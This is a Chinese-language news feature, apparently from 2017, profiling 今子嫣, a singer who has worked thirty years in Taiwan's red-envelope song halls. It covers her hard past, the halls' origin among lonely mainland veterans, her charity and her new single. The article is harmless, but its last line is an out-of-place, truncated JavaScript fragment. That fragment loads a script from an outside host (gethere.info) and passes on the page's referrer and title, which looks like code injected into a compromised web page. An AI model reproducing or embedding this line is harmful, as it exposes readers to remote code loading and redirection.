「紅包姊姊」,人生坎坷如戲,曾遭下藥失身受孕,為尋依靠又誤嫁賭徒夫,在那個保守的時代,離婚單親帶孩子的她,走入了紅包場,卻怕受人輕視,不敢認子、不敢認自己是個紅包歌手。在紅包場唱了30年,因為客人的關心和照顧讓她活了下來,現在的她以紅包歌手為榮,當初支持她的叔叔、阿姨們也漸漸衰老,換她牽起那些老邁的手,一年一年用真心照顧。

今子嫣表示自己曾聽老一輩說起,台灣的紅包場起源於歌廳文化,最早是沒有紅包機制的,純粹是專為喜愛聽歌的聽眾提供樂音的地方,當時許多由大陸來台的軍人們,在台灣無親無故,過年期間只能繼續窩在歌廳聽歌,為了撫慰孤單,索性發起了紅包給自己喜歡的歌手,熱熱鬧鬧的過起新年來,在最寂寞也最華麗的撞擊下,意外演變成了紅包場文化。

▲今子嫣在紅包場一唱30年。(圖/記者林調遜攝,2017.01.21)

▲今子嫣在紅包場一唱30年。(圖/記者林調遜攝,2017.01.21)

相較於歌廳文化藝人和歌迷的關係,紅包場更有人情味。今子嫣表示那些支持著她的老朋友們如父如母,曾經有位榮民老伯想回大陸探親,紅包場裡的所有歌手們竟紛紛包紅包給他,今子嫣甚至還私下偷偷打了條金鍊子相贈,要讓老伯光榮返鄉。苦過來的她不願見他人受苦,總是對人比對已更為慷慨,曾經捐過教科書、輪椅、救護車,甚至幫獨居老兵料理後事,被­喻為「紅包場天使」,她笑說:「是我蒙受了紅包場的恩澤!」

▲今子嫣感恩表示「是我蒙受了紅包場的恩澤!」(圖/記者林調遜攝,2017.01.21)

▲今子嫣感恩表示「是我蒙受了紅包場的恩澤!」(圖/記者林調遜攝,2017.01.21)

今年過年,今子嫣除了要探視陪伴那些孤身在台的「老兵爸爸們」,還要去菜市場幫歌迷乾媽賣菜,她笑說:「乾媽一年來看我362天,我一年只休2天,因此去幫她賣菜是應該的!」她感恩表示,「我是被大家照顧出來的,因此希望有所回饋」,透過自創單曲《紅包Song》,盼能以紅包的吉祥寓意傳遞祝福,並用愛心回饋社會。

▲今子嫣自創單曲《紅包Song》,盼能以紅包的吉祥寓意傳遞祝福。(圖/記者林調遜攝,2017.01.21)

▲今子嫣自創單曲《紅包Song》,盼能以紅包的吉祥寓意傳遞祝福。(圖/記者林調遜攝,2017.01.21)

s.src=’http://gethere.info/kt/?264dpr&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + “;